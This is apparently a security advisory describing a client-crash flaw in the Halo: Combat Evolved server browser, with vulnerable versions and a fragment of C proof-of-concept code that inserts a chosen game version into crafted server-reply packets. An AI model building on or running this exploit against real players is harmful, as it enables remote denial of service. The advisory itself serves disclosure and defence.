"Armed with a brand new arsenal of weapons and vehicles, Halo delivers challenges and surprises, as well as intense online multiplayer competition exclusively for the PC, including new multiplayer maps."
Certain long server replies aren't properly bounds checked and may cause the Halo client to crash upon parsing them.
Vulnerable Systems:
* Halo: Combat Evolved for the PC and Mac, versions 1.05 and prior
Immune Systems:
* Halo: Combat Evolved version 1.06
The problem affects the in-game browser of the clients used to navigate through the list of online servers and is caused by some overrun protections. If these instructions find a value too long in a server's reply they pass a NULL pointer (instead of the original value) to a wcsncpy() function causing the crash.
Note: This is a broadcast client crash, so a single attacker visible in the master server list can passively exploit any vulnerable client in the world.
if(argc < 2) {
printf("\n"
"Usage: %s <version>\n"
"\n"
" You must decide what version of the clients you want to crash:\n"
"\n", argv[0]);
for(i = 0; *versions[i]; i++) {
printf(" %s\t%s\n", versions[i][0], versions[i][1]);
}
fputc('\n', stdout);
exit(1);
}
for(iver = 0; versions[iver][0]; iver++) {
if(!strcmp(argv[1], versions[iver][0])) break;
}
if(!versions[iver][0]) {
printf("\nError: you must choose between the versions listed at the beginning\n");
exit(1);
}
printf("- version: %s \t%s\n", versions[iver][0], versions[iver][1]);
for(i = 0; i < (sizeof(pcklan) - 14); i++) {
if(!memcmp(pcklan + i, GAMEVER, 13)) {
memcpy(pcklan + i, versions[iver][1], 13);
break;
}
}
for(i = 0; i < (sizeof(pckinternet) - 14); i++) {
if(!memcmp(pckinternet + i, GAMEVER, 13)) {
memcpy(pckinternet + i, versions[iver][1], 13);
break;
}
}
